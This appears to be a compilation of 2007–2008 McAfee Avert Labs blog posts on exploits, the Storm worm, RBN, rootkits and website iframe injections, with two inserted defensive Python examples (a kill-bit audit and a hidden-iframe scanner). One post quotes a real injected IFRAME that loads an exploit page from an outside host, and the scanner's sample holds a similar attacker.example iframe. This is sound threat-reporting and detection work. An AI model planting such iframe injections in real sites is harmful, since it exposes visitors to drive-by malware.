Malware authors will find this technique of using exploit-laden PDF files in spear-phishing attacks very profitable, especially since the Portable Document Format (PDF) is a de facto standard for exchanging electronic documents online. PDF files have traditionally gone unfiltered at the gateway and until recently were considered risk free, in contrast to the notorious history of Microsoft Office documents.

With the release of Windows Vista and Microsoft Office 2007, however, Microsoft has made it harder for attackers to use buffer overflow exploits, so we expect exploit writers to go after the lower-hanging fruit. Exploiting vulnerabilities in popular applications from Adobe, Apple, or RealPlayer is proving just as advantageous and profitable for the bad guys.

We strongly advise users running vulnerable versions of Adobe Reader and Acrobat to update them from the Adobe site. McAfee users are protected against these maliciously crafted PDF files with today’s 5227 DAT release, which detects them as Exploit-PDF.b.

Yet another Yahoo zero-day attack hits the Web

Zero-day vulnerabilities in Yahoo products are nothing new and should be taken very seriously. Last year we also saw a couple of ActiveX-based vulnerabilities in Yahoo Messenger that are still being exploited and incorporated into various web-based attack kits. One of the most prolific is still the Yahoo Webcam ActiveX controls buffer overflow vulnerability.

Yahoo Music Jukebox is free music-management software that lets you play music files, burn CDs, and tune in to your favorite Web radio stations. Within a day of the new Yahoo Jukebox zero-day being publicly disclosed on February 2, a fully working exploit was developed and widely circulated on various forums.

The first vulnerability is a stack-based buffer overflow triggered by an overly long “url” parameter passed to the AddButton and AddImage methods of the YMP DataGrid ActiveX control (datagrid.dll).

The second vulnerability is a buffer overflow triggered by a long “bitmapUrl” parameter passed to the AddBitmap method of the YMGMediaGridAx ActiveX control (mediagridax.dll).

This issue has been observed with mediagridax.dll version 2.2.2.056 and datagrid.dll version 2.2.2.056, which are distributed as part of the latest Yahoo Music Jukebox (2.2.2.056) and a few older Yahoo Messenger versions.

A temporary workaround is to set the kill bit for the offending ActiveX controls, i.e. create a Compatibility Flags DWORD value of 0x400 under each of the following keys:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5F810AFC-BB5F-4416-BE63-E01DD117BD6C}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{22FD7C0A-850C-4A53-9821-0B0915C96139}

It may only be a matter of time until we see customized versions of these exploits in the wild, employed by malware authors to infect machines. McAfee customers have been protected from this threat since the 5223 DATs, as JS/Exploit-YahooGrid.

Making News with Old Word(s): MS06-027 and MS07-014

This week, McAfee® Avert® Labs detected a batch of old and uninteresting OLE exploits. The fact that they are old and still actively used by malware authors, however, shows that they remain a potent threat to the many computer users who do not routinely patch their systems.

At least seven maliciously crafted Word documents, touting recent political news, are believed to have taken their content directly off the Internet:

  • African countries need to further consolidate macroeconomic stability.doc
  • Free Tibet Olympics Protest on Mount Everest.doc
  • Hong Kong Parade Supports 19 Million CCP Withdrawals.doc
  • DIRECTORY OF TIBET SUPPORT GROUPS IN INDIA.doc
  • 2007-07 DRAFT Tibetan MP London schedule.doc
  • CHINA’S OLYMPIC TORCH OUT OF TIBET 1.doc
  • Disapppeared in Tibet.doc

Each of these documents is designed to install further backdoor or downloader Trojans on systems running unpatched versions of Microsoft Word. Two known Word vulnerabilities are exploited; the corresponding patches are:

Vendor patch    Release date
MS06-027        June 13, 2006
MS07-014        February 13, 2007

For McAfee customers, proactive detection is available. For more information about coverage for your setup, go here:

Once again, we offer the gentle reminder to install the latest security patches from the vendor.

Excel Zero Day Overdue?

Last night Microsoft released Security Advisory (947563) following the discovery of a targeted zero-day attack. Microsoft states that the following products are vulnerable:

  • Microsoft Office Excel 2003 Service Pack 2
  • Microsoft Office Excel Viewer 2003
  • Microsoft Office Excel 2002
  • Microsoft Office Excel 2000
  • Microsoft Excel 2004 for Mac

I took a look at previous Office zero-day vulnerabilities discovered through active exploitation since the beginning of 2005. As you can see below, there was a seven-month gap in the public disclosure of such vulnerabilities.

Although this bit of trivia is somewhat interesting, it’s difficult to draw meaning from it. It’s possible that the lull exists only in reporting, rather than in the active exploitation itself. Here’s a per-product breakdown of the source of the vulnerabilities:

The last Excel zero-day discovered through exploitation was reported more than 18 months ago.

The Russian Business Network is on tenterhooks

It’s not a secret anymore: the criminal organizations behind a large part of Internet-related fraud are huge and well organized. In the last quarter of 2007, two studies about RBN (Russian Business Network), one of the best-known criminal organizations so far, were published. Last year, I read them with great interest. The first is named Uncovering Online Fraud Rings: The Russian Business Network and is available as a webcast recording on the Verisign web site. The second was written by David Bizeul and is named Russian Business Network study.

These papers demonstrate and illustrate that RBN is an empire. It directly or indirectly manages potentially a million sites. Thanks to elaborate, intrusive advertising techniques, millions of Internet users visit its fake retail sites every month. Hackers and other cybercriminals also have their stores and outlets there: malware sales, service offers and booby-trapped sites. Pornography, including child pornography, always makes money there.

In addition to these documents, some particularly thorough stories have been circulating on the Net (papers by Brian Krebs of the Washington Post, and posts on the RBNexploit and Dancho Danchev blogs).

Mailing addresses, names and photos of suspects, detailed lists of machines and autonomous systems, as well as many other details, were revealed. Because of this, the group deemed it best to partially disappear. On November 6th, 2007, many network nodes stopped responding. It was not the end of them though; the move had been carefully planned: high-activity sites, those leading the attacks at the time, were not disturbed. Gradually, the affected sites began to reappear in Russia and all over the world. Today, many countries in Southeast Asia are mentioned, but they are not alone. The reorganization is under way: new retail payment systems for fake products (mainly fake security products and fake video codecs), new legitimate sites hosting tricky banner ads that redirect computers to these fake retail web sites, new Storm (aka Nuwar) worm campaigns run from new C&C botnet implementations, and new web sites hosting malicious software (like MPack or WebAttacker) that are reached silently after victims encounter a hidden iFrame while surfing.

People tracking RBN regularly watch its Autonomous Systems (AS). These are collections of connected IP networks controlled by a single entity and identified by an AS number. The RBNexploit blog and the David Bizeul document are very comprehensive on this subject, and various network maps and tables help the reader understand the complexity of such an organization.

One puzzle piece is known as AS40989. Despite not being the core of RBN activity, it is well known because it appears to carry the official name of the group. It is the subject of a new write-up available on the Shadowserver Foundation web site.

This document analyzes the malicious binary activity directed to and commanded by AS40989. From March to November 2007 the researchers collected 2859 pieces of malware which initiated HTTP connections to it. They found an impressive collection of malware: “Gozi, Goldun, Hupigon, Nurech, Nuklus, Pinch, Sinowal, Tibs, Xorpix, various dialers, downloaders, worms, adware, page hijackers, and proxies”. Once again, it demonstrates the professionalism and the size of the group.

Reading material on RBN is abundant. With this post, I only wish to draw your attention to that existing material. It demonstrates the vitality of the new criminal organizations, and it also demonstrates that many people, at McAfee and elsewhere, stay tuned in to the dark side of the Internet to understand how the situation is constantly changing and to fight this threat at a worldwide level.

Benazir Bhutto Assassination: New Avenue for Spreading Malware

A few weeks back we blogged about malware-laced codecs embedded in various Blogspot domains. Today, within hours of the assassination of former Pakistani Prime Minister Benazir Bhutto, malware authors started capitalizing on the news to spread a new fake codec, this time purported to be a video of the assassination.

Claiming to be a new HD codec, the malware authors attempt to social-engineer users into believing they are downloading a legitimate codec for playing the video. At the time of writing, at least 10 Blogger websites have been observed hosting this fake video, which redirects users to a typo-squatted domain containing the fake codec:

http://video.googl.[removed]

Malicious code hosted on the 3322 domain is nothing new. One of the recent high-profile attacks that pointed to a malicious script on the 3322 domain was the Indiatimes Mail hack.

There are a plethora of websites that attempt drive-by installations when unsuspecting users visit pages returned by search engines for “Benazir Bhutto”. Many of these compromised pages have malicious scripts injected into them that point to the 3322 domain. The pages contain obfuscated variants of the MS06-014 exploit, which is perhaps the most popular of all the exploits we see on a daily basis.

This fake codec Trojan is detected by the current DATs as Puper. The downloaded exploit is detected as VBS/Psyme and the executable as Generic Downloader.c.

(Credits to Pradeep Govindaraju for the great malware analysis)

On the path to cross platform exploits

Occasionally we find PC malware that can have an effect on mobile phones or vice versa. The W32/Mobler worm installs SymbOS/MultiDropper.CC to any Windows system it infects. The Symbian malware has no effect on the PC. Similarly SymbOS/Multidropper.CC installs W32/Mobler to the memory card. The mobile version is arguably more effective as inserting a memory card with Mobler into a PC with AutoRun configured is enough to cause an infection.

The malware author was trying to save some effort in the creation of new malware by reusing older malware. This is not the usual case with malware as creators, driven by the need to avoid detection, produce their own code or use newer malware toolkits.

Multi platform exploits
The situation with vulnerability exploits is more complex. While exploits are usually tied very closely to hardware and operating systems, they are also occasionally distributed as source code, allowing study and modification. An example of this is the libTIFF exploit used by hackers to install homebrew games on the Sony PlayStation Portable (PSP). The PSP libTIFF exploit was subsequently ported to the iPhone and allowed the installation of third-party applications. Security researchers later added the libTIFF exploit to a penetration testing framework.

Portable malware knowledge
Penetration testing frameworks help to tie exploits to payloads (e.g. gaining control of a vulnerable system). The frameworks allow the reuse of previous vulnerability research. This helps reduce the work needed by a penetration tester or attacker to fully utilize an exploit. They can write multiple payloads for a single vulnerability exploit.

In a series of blog postings, a security researcher detailed the process he used to port the libTIFF exploit and develop multiple payloads for the iPhone. It helped a bit that the iPhone and Macs are both running versions of OS X. Although they work on different types of CPUs (x86 for Mac; ARM for iPhone), he was able to leverage his Mac payload knowledge to produce iPhone payloads in a few weeks’ time.

Mobile exploits
This week we saw the release of a number of exploits for a buffer overflow vulnerability in various PC multimedia players. The vulnerability was limited to a specific MP4 video file codec. The exploits, which we detect as Exploit-MP4, were implemented as specially crafted MP4 video files.

There was a possibility that the malformed video files could cause issues on mobile phones. During testing we found that one of the exploits caused certain phones to hang when played. When we investigated further, we discovered that a buffer overflow similar to the one on the PC existed on the phones. While the exploit currently only causes a denial of service, it is possible that an attacker could develop a more malicious payload for the affected phones. The example of the penetration testing framework shows that it is relatively straightforward for dedicated attackers to use previously gained knowledge to produce mobile exploits in short periods of time.

Rootkits in China Part 1

The term “rootkit” was originally used to refer to toolkits used by root privileged users. This definition has evolved over time. Nowadays, the term rootkit refers to backdoor programs that run with elevated privileges and that are designed to evade detection by users, administrators and rootkit detection software. Rootkits first appeared in China in 2001 and have evolved substantially since then.

These days most rootkits are installed through exploitation of web browser vulnerabilities or from the infection of viruses and worms. In some cases, rootkits are bundled with images that exploit image library flaws to gain access to systems. In other cases, exploits for previously unknown vulnerabilities (zero-day) are placed on web sites and used to hack browsers and install rootkits. For example, exploits for the zero-day vulnerability identified by CVE-2007-0038 were found on many Chinese websites several months before a patch was released. In other cases, popular websites and public forums are hacked. Their content is then modified to include exploits that install rootkits on to user systems. Often, attackers exploit script injection vulnerabilities to gain access to these web sites. They then upload exploits for known issues like MS06-001, MS06-014, MS06-055, MS07-017, the Baofeng ActiveX vulnerability, the RealPlayer ActiveX vulnerability and so on.

In China, many rootkits also spread via malware that targets a popular IM client named QQ. Once a QQ user’s machine has been compromised by a rootkit, it will send messages containing links to malicious websites to all of the friends of the affected QQ user. If these users click the links, they too will be targeted. This method of propagation is widespread and difficult to defend against.

Another technique used to spread rootkits is the addition of malicious programs to pirated software like Windows, Photoshop, Office, etc. People who download and install these pirated programs are infected by the rootkits bundled with them. Since pirated software is popular in China, many machines are infected this way.

Stay tuned for Part 2…..


Web Site of the French Embassy in Libya Under Attack

For a long time, we spoke regularly about IFRAME injection. This year, many pages belonging to legitimate sites were secretly modified. Many will remember the Italian Job and the thousands of infected sites in the realm of tourism, the car industry, movies and music.

The people behind these attacks love to use highly topical issues in order to attract as many people as possible. This week in my country, the visit by Libyan President Muammar Khadafi is stirring controversy. It has made many headlines in France. No doubt this is why the French Embassy Web Site is now infected by malicious code. Please do not attempt to reach the site; it is still dangerous.

This first iframe routes the victim to sites hosted by a Hong Kong provider. Two further links then redirect the visitor.

From Hong Kong, we move to Russia and Ukraine, where an exploit and downloaders are used (Exploit-YIMCAM and downloader-AUD).

Once again, we can see how people involved in such attacks use dedicated malicious web sites in various countries to make it difficult to defeat them. It is especially difficult when an ISP agrees to host web sites without verifying even the minimal data that criminals enter when they register. The following example, which I found when I looked at this attack, fully demonstrates this:

Be careful of Real Media files downloaded from the Internet

Recently, I had some friends complain about problems with Real Media files (*.rm/*.rmvb). According to them, after downloading and playing rmvb files, the Real Media Player launched a malicious webpage without prompting. Later, they noticed their OS running noticeably slower. And later still, they found their IM account passwords modified and online gaming accounts stolen.

It appears that the media files they downloaded were created by a hacker and designed to open malicious webpages. I investigated this and found it is quite easy to add a malicious webpage to rmvb files. The hacker used freely available software. These programs include applications which can be used to add events to rmvb files. A time and a URL are specified in a text file, then imported into the rmvb file using these programs, and that’s it! When the rmvb file is opened in RealPlayer, the URL will automatically be opened after the specified time has elapsed. My advice was to scan any downloaded media files with antivirus software before playing them. Another option is to use a player other than RealPlayer.

Hope you can enjoy Real Media without the malicious webpages!!!

MS Access Exploit in the Wild

You may have seen a number of news reports in the past day or two on the active exploitation of a Microsoft Access vulnerability. Here is one story by PC World.

The US-CERT’s current activity Web page, “a regularly updated summary of the most frequent, high-impact types of security incidents currently being reported to the US-CERT,” warned about this active exploitation on December 10.

It is rumored that the vulnerability being exploited is CVE-2007-6026.

Avert Labs is working to find out more. As they say in the press, watch this space!

While we wait, here’s what we know about CVE-2007-6026. It’s a stack overflow in Access. A user would have to open a specially crafted Access database for an attack to take place. Although user assistance is required for exploitation, an exploit could be delivered over various attack vectors, including the Web, e-mail, and IM. Attacks could be coupled with well-established social engineering techniques. And now for the rub: this vulnerability is currently unpatched.

Avert Labs’ 2008 Threat Predictions

It seems to be about that time to, once again, get out our computer security crystal ball and conjecture about the upcoming year.

Many things are changing. Some are staying the same. In some areas we are in uncharted territory.

Threats are moving quickly to technologies such as VoIP and instant messaging. Virtualization will have a huge impact on both data security and the data security industry itself. Professional and organized criminals continue to drive much of the malicious activity. The complete set of predictions is available for download on McAfee’s Threat Center as well as a bonus episode of our podcast AudioParasitics.

Day in the life of a researcher

Most of the virus researchers in Avert spend their days analyzing samples coming in from customers. With a good percentage of the samples coming in every day being unknown, there’s plenty to keep us busy, 24/7/365. But what is it like, sorting through an unending stream of samples every day? What does that entail?

It’s a bit like trying to identify a life-form from a disconnected body part. Sometimes the body part is actually the whole animal, but it’s often just a toenail or a feather. There are times where we don’t even get a body part, but a footprint or a piece of the animal’s droppings.

Sometimes we’ll get lucky and it’s an animal whose footprint we know really well, or which has very distinctive feathers. Then we can say “there’s a good chance what you have is a peacock”, based on just that feather. But more often than not, people are dealing with something entirely new or rare. Perhaps this critter only displays its distinctive traits in very specific circumstances.

Of course, our favorite sort of sample is one which is a complete body with a good explanation of where and how the animal was found. Whereas a foot accompanied by no information may get an answer of “This is an amphibian”, more of the animal or more context can increase the odds of us being able to say something more specific: “This is Litoria caerulea – aka the Dumpy Tree Frog. It lives in Australia and it is often found hiding in downspouts.”

So how does someone wishing to submit something for analysis go about doing it?

For starters, include as much info as you can: What version of security product are you using? In the case of our products, what version of the product, what engine and DAT files are you using? Are you seeing detection with some AV product? What filename and virus name was given? Are you seeing strange behavior that you associate with the file?

Getting the whole beast can be a bit more tricky. There’s sort of a continuum of sneakiness, from very spammy-looking emails with attachments, to bots which get in through software vulnerabilities and then drop rootkits. If you’re the “lucky” recipient of the easy variety, ZIP up that email and send it to us.

If your sample falls somewhere on the sneakier side of the spectrum, files can really be scattered all over a machine, and some of them are particularly good at hiding. You may want to try scanning your system with the Rootkit Detective or the Beta DATs from the Avert Tools page. This can help identify more suspicious files.

Maybe you’re pretty astute and you’ve noticed that after you ran a strange file, it created hundreds of randomly named files in your Windows directory. We may or may not need more than one of those files. You’ll want to check for duplicates, to make sure. If you know how to generate hashes for a file, just make sure you have one of each unique hash, up to about 10. (If you have something parasitic or polymorphic this will give us a decent representation.) If you’re not sure how to create a hash, there are certain programs which can help you. One of my favorites is the CRC option in WinZIP (in Configurations, under the Options menu). This allows you to group by CRC and get rid of any duplicates.

In short, try not to just send a blurry video of Sasquatch (or is that a guy in a gorilla suit?) or to send us a hundred disembodied ant legs. The more thorough and complete the sample, the better the chances of getting a complete picture of what’s plaguing your machine.

PDF mailto Exploit: Seen in wild today!

McAfee Avert Labs today observed e-mail messages with malicious PDF attachments exploiting the critical Adobe Acrobat Mailto Unspecified PDF File Security Vulnerability (CVE-2007-5020) being spammed in the wild. Successful exploitation leads to a batch file being executed on the victim’s machine that disables the built-in Windows firewall and then downloads a password stealer from an IP address located on the RBN network.

Malware authors will find this technique of sending exploit-laden PDF files extremely profitable especially in targeted attacks since the Portable Document Format is the de-facto standard for exchanging electronic documents. PDF files have traditionally been unfiltered at the email gateway and until recently were considered risk free in stark contrast to the notorious history associated with Microsoft Office documents.

But with Microsoft making it difficult for attackers by raising the bar for buffer overflow exploits with the release of Windows Vista and Microsoft Office 2007, we expect to see exploit writers target the lower-hanging fruit. Abusing flaws in popular applications such as Adobe, Apple, RealPlayer or antivirus products is proving to be just as advantageous and profitable for the bad guys. McAfee Avert Labs anticipates that spammers in collusion with malware authors will continue exploiting popular application flaws, and it is imperative that users are educated on how to avoid becoming a victim.

Users running vulnerable versions of Adobe Reader and Acrobat 8.1 or earlier are strongly advised to update them from the Adobe site. McAfee users are pro-actively protected against Exploit-PDF based threats with the latest DAT files.

RealPlayer ‘Zero Day FIX’ Hits the Web

Earlier today we posted a blog entry: RealPlayer Zero Day Exploit Hits the Web.  Well RealPlayer responded RealQuick.  In less than 24 hours they managed to ship a patch.  That’s what I call rapid response.  Real also states that more information will be posted on their Security Updates & Incident Reports page.

Earlier today McAfee’s Regional Virus Info identified over 250 unique machines reporting Exploit-RealPlay.a detections, 99% of which reside in the US. This does not mean that each of these systems was vulnerable, but it does mean that in all likelihood thousands of systems worldwide were exposed to the malicious code.

RealPlayer Zero Day Exploit Hits the Web

Last night we obtained a sample of a RealPlayer zero day exploit.  RealPlayer 11 Beta, 10.5, and older versions are affected.  Today’s DAT release, version 5145, contains detection under the name Exploit-RealPlay.a.  At this point, exposure appears to be limited, but we can expect public exploit code to surface before too long.  At that point exploitation is likely to follow the path of many other drive-by exploits and become fairly well distributed.

The vulnerability lies in a RealPlayer ActiveX control, and can be mitigated by setting the appropriate kill bit via the registry:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
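As an added example (not code from the original post), here is a small Python audit that parses an exported .reg file and reports whether the kill bit (Compatibility Flags bit 0x400) is set for the CLSID above; the sample export text and the second CLSID in it are constructed placeholders.

```python
# The Compatibility Flags bit that tells Internet Explorer never to load a control.
KILL_BIT = 0x400
# CLSID of the RealPlayer ActiveX control named in the post.
REALPLAYER_CLSID = "{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}"
ACTIVEX_COMPAT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"

# Constructed sample of `reg export` output; the second CLSID is a placeholder.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000000-0000-0000-0000-000000000001}]
"Compatibility Flags"=dword:00000000
"""


def parse_reg(text):
    """Parse the subset of .reg syntax needed here (key paths and DWORD values).

    Returns {key_path: {value_name: int}}; non-DWORD values are ignored.
    """
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and "=" in line:
            name, _, value = line.partition("=")
            name = name.strip().strip('"')
            value = value.strip()
            if value.lower().startswith("dword:"):
                keys[current][name] = int(value[6:], 16)
    return keys


def kill_bit_set(reg, clsid):
    """True when Compatibility Flags for clsid has the kill bit set.

    Registry key paths are case-insensitive, so the comparison is too.
    """
    wanted = (ACTIVEX_COMPAT + "\\" + clsid).upper()
    for key, values in reg.items():
        if key.upper() == wanted:
            return bool(values.get("Compatibility Flags", 0) & KILL_BIT)
    return False


def kill_bit_reg(clsid):
    """Produce .reg text that sets the kill bit for clsid (importable with regedit)."""
    return (
        "Windows Registry Editor Version 5.00\r\n\r\n"
        "[%s\\%s]\r\n" % (ACTIVEX_COMPAT, clsid)
        + '"Compatibility Flags"=dword:%08x\r\n' % KILL_BIT
    )


def audit(reg_text, clsids):
    """Map each CLSID to whether the export shows its kill bit set."""
    reg = parse_reg(reg_text)
    return {c: kill_bit_set(reg, c) for c in clsids}


if __name__ == "__main__":
    for clsid, ok in audit(SAMPLE_REG, [REALPLAYER_CLSID]).items():
        print(clsid, "kill bit set" if ok else "kill bit NOT set")
```

Run `reg export "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility" out.reg` on the machine and feed the file to `audit()`; `kill_bit_reg()` yields the import file for a CLSID that is still missing the bit.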

While we generally keep this blog research focused (and shy away from mentioning products), zero day exploit announcements seem half-done without some mention of information on how our products deal with the threat.

McAfee product coverage information will be sent out via a McAfee Avert Labs Security Advisory service shortly.  This includes coverage information for the following product lines.

  • All McAfee virus scanning technologies that utilize the DAT files, including:
    • GroupShield
    • LinuxShield
    • PortaShield
    • Secure Internet Gateway
    • Secure Messaging Gateway
    • Secure Web Gateway 
    • Total Protection (TOPS)
    • VirusScan Enterprise
    • VirusScan Online
  • VirusScan Enterprise Buffer Overflow Protection
  • Host IPS
  • IntruShield
  • Foundstone
  • McAfee Network Access Control (MNAC)
  • McAfee Policy Auditor and McAfee Remediation Manager compliance

Nuwar starts ‘Krackin’

The latest trick Nuwar (aka Storm) plays looks like this:

Screenshot of Webserver

Like previous variants, the HTML page contains a script that attempts to execute the malicious file hosted on the webserver. However, even if this exploit code gets blocked by AV software or is not executed at all because of security settings in the browser, the user still has the option to click on the download button and infect their machine.

McAfee VSE8 Alert

Make sure you’re protected so you do not join the Storm network!

No laughing matter or Curiosity killed the cat

Nuwar (aka Storm Worm) changed tactics yet again. Now it attempts to lure its victims by a promise of a good laugh at a “Psycho cat”:

If you do click on the URL you get a page loaded with the usual cocktail of exploits etc.:

So, if you’re not running an on-access antivirus you are in trouble. The page itself pretends to be a funny greeting, complete with a ShockWave clip of a laughing kitty with an appropriate and rather infectious (pun intended) laughter audio.

And, of course, pretty much wherever you click on the page, you get nothing but Nuwar.


Nod to more ARP mayhem?

Following our blog about the significance of web hosting security vs. ARP spoofing, our friends from security vendor ESET made an official statement on October 9th about an ARP attack against their official China website earlier this week. Identical to other ARP attacks, their web pages were found to have the following malicious IFRAME link inserted:

<iframe src=http://fs18.net/down{blocked}/yy.htm width=20 height=0 frameborder=0></iframe>

The “yy.htm” web page, detected generically as Exploit-MS06-014, can download a variety of malware including:

  • vip1.htm (Exploit-BaoFeng.a)
  • 0.exe (PWS-QQGame)
  • kvmxeis.exe (PWS-OnlineGames.a)
  • ii.exe (PWS-QQPass.dll)
  • SysWin78.Jmp (PWS-QQGame)
  • WinSys88.Sys (PWS-QQGame)
  • System6.ins (PWS-QQPass.dll)

In 2007, hijacking of popular websites has become one of the many effective malware propagation methods in China. From W32/Fujacks-style web page infection to ARP spoofing, we have seen many important websites reportedly hijacked to host exploits and malware since the end of 2006.

With relatively good success, this means of malware infection and exploitation has also rapidly evolved from common Microsoft vulnerabilities (Exploit-MS06-014, Exploit-MS07-004, etc.) to application-level vulnerabilities such as those in Yahoo Messenger, a Chinese media player called Baofeng, and PPStream.

Network intrusion prevention, web server policies and patch management come to mind as the needed minimum defenses, and should be reviewed by companies using or offering web services as well as by ISPs.

Labor Day gift from Nuwar!

W32/Nuwar, aka the Storm worm, has relentlessly flooded internet users with its ever-changing email campaigns ever since its debut in Nov 2006. With the Storm worm authors having this uncanny knack of using sensationalist themes that draw public attention, the morbid curiosity it has generated has ensured that it is the most blogged-about piece of malware this year!

The latest campaign is an HTML formatted email using the Labor Day theme, inviting users to view an online greeting card. A copy of the spammed email is as follows:

Copy of Spammed Email.

The authors have used anchor tags in HTML to mask the greeting card link so that an unsuspecting user does not notice that it actually points to a malicious IP address. Hovering the mouse over this disguised link is a quick and dirty way to reveal the real destination address. Users who fall for this bait are directed to the following Happy Labor Day page.

Happy Labor Day bait page.
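Both tricks discussed on this page, the zero-height off-site IFRAME injected into hijacked web pages (the ESET post above) and the anchor whose visible text hides a raw-IP href (this Labor Day mail), can be flagged by a gateway or incident responder with a simple HTML inspection. The following Python scanner is an added example, not code from the original posts; the sample page and every host and IP in it are constructed placeholders.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a zero-height off-site iframe like the injected
# "yy.htm" one, and a greeting-card link whose text hides a raw-IP href.
# All hosts and addresses are placeholders, not indicators from the posts.
SAMPLE_HTML = """
<html><body>
<p>Welcome to our site</p>
<iframe src=http://attacker.example/yy.htm width=20 height=0 frameborder=0></iframe>
<p>You have received a greeting card:
   <a href="http://192.0.2.10/">www.greetings.example</a></p>
<a href="https://news.example/story">Read the story</a>
<iframe src="https://video.example/player" width="640" height="360"></iframe>
</body></html>
"""


class IndicatorParser(HTMLParser):
    """Collect every iframe's attributes and every anchor's (href, visible text)."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.anchors = []
        self._href = None  # href of the anchor currently open, if any
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append(a)
        elif tag == "a":
            self._href = a.get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _dim(value):
    """Pixel dimension as int, or None when absent or non-numeric."""
    try:
        return int(value.strip().rstrip("px"))
    except ValueError:
        return None


def hidden_iframes(iframes, page_host):
    """Off-site iframes a visitor cannot see: zero-sized or hidden by style."""
    found = []
    for a in iframes:
        src = a.get("src", "")
        w, h = _dim(a.get("width", "")), _dim(a.get("height", ""))
        zero_sized = (w is not None and w <= 1) or (h is not None and h <= 1)
        style = a.get("style", "").replace(" ", "").lower()
        hidden_style = "display:none" in style or "visibility:hidden" in style
        if src and _host(src) not in ("", page_host) and (zero_sized or hidden_style):
            found.append(src)
    return found


# A URL or bare domain appearing in the visible text of a link.
_HOST_IN_TEXT = re.compile(r"(?:https?://)?((?:[\w-]+\.)+[a-z]{2,})")


def masked_anchors(anchors):
    """Links whose text names a host the href does not lead to, or whose href is a bare IP."""
    found = []
    for href, text in anchors:
        href_host = _host(href)
        if not href_host:
            continue
        m = _HOST_IN_TEXT.search(text.lower())
        text_host = m.group(1) if m else None
        if text_host and text_host != href_host and not href_host.endswith("." + text_host):
            found.append((href, text, "text shows %s, href goes to %s" % (text_host, href_host)))
        elif _is_ip(href_host):
            found.append((href, text, "href points at raw IP %s" % href_host))
    return found


def scan_html(html, page_host):
    """Run both checks over one page; page_host is the site the HTML belongs to."""
    p = IndicatorParser()
    p.feed(html)
    p.close()
    return {"hidden_iframes": hidden_iframes(p.iframes, page_host),
            "masked_anchors": masked_anchors(p.anchors)}


if __name__ == "__main__":
    for kind, hits in scan_html(SAMPLE_HTML, "www.example.org").items():
        print(kind, hits)
```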

Everything looks hunky-dory, except that an unsuspecting user is served an XOR’ed exploit cocktail in the background. In addition to the usual Microsoft exploits, QuickTime and WinZip buffer overflow exploits are also attempted on a user’s machine. Given the slim likelihood of vulnerable third-party applications being up to date on a user’s machine, this increases the attacker’s chances of a successful exploitation, especially since most applications do not support automated updates and it is left up to the users to first find out whether they have a vulnerable version of the application and then manually patch it.

Enterprise customers have the bandwidth and resources to ensure every machine on the corporate network is fully patched. It is usually home consumers – the low hanging fruit that fall prey to these malicious tactics. For users wanting to check if third party applications on their systems are vulnerable, a free online resource to visit would be the Secunia Software Inspector. Happy Patching :D

Yahoo Fixes Webcam Vulnerability

The patches for the Webcam vulnerabilities we reported earlier have been released by Yahoo. We urge Yahoo Messenger users to download the latest Messenger. Thanks to the Yahoo security team for working with us to resolve this issue in a short time. Here’s what you need to know.

New Anti-Virus Book Hot Off the Presses

I’m excited to announce YAAVB! No doubt you recognize that acronym as “yet another anti-virus book.”

And the book that I am proudly holding in my hands is entitled “AVIEN Malware Defense Guide,” and I contributed a chapter to it.


In its 540 pages we cover the following topics:

  1. “Customer Power and AV Wannabes”
  2. “Stalkers on Your Desktop”
  3. “A Tangled Web” (by yours truly)
  4. “Big Bad Botnets”
  5. “Creme de la Cybercrime”
  6. “Defense-in-depth”
  7. “Perilous Outsourcery”
  8. “Education in Education”
  9. “DIY Malware Analysis”
  10. “Antimalware Evaluation and Testing”
  11. “AVIEN and AVIEWS: the future”

Here’s the team that worked on this book: David Harley, Ken Bechtel, Michael Blanchard, Henk Diemer, Andrew Lee, Igor Muttik, Bojan Zdrnja, Paul Baccas, Tony Bradley, Ken Dunham, Jim Melnick, Enrique Gonzalez, Judith Harley, Dave Phillips, Paul Schmehl, Robert Vibert, and James Wolfe. I would like to express my sincere thanks to David Harley, who put together this team of professionals and led us through a book-writing exercise. It was fun!

I have not yet read all the chapters, but I know the guys well and expect great contributions from all of them!

The book came out under the umbrella of AVIEN (Anti-Virus Information Exchange Network–www.avien.net). This group was formed around 2001 to exchange information related to malware outbreaks. In recent years, due to the lack of large-scale outbreaks, participants simply share all sorts of security information and enjoy communicating with each other. One of the outcomes is this book.

Finally, the book was published by Syngress, retails for US$59.95 (ISBN-13: 978-1-59749-164-8), and is available from major book stores: http://www.amazon.com/AVIEN-Malware-Defense-Guide-Enterprise/dp/1597491640. So far there are two positive reviews, though both came from the team of authors. :-)

I hope you enjoy the book, and I look forward to reading your valuable comments!

Targeted Zero-day Attack Against Free Tools – LHAZ

Another exploit targeting a Japanese application was found today. This time, a free decompression tool, LHAZ v1.33, was used in a targeted attack. Maliciously crafted zip files could take advantage of an unidentified vulnerability in this tool and drop a BackDoor-CKB trojan.

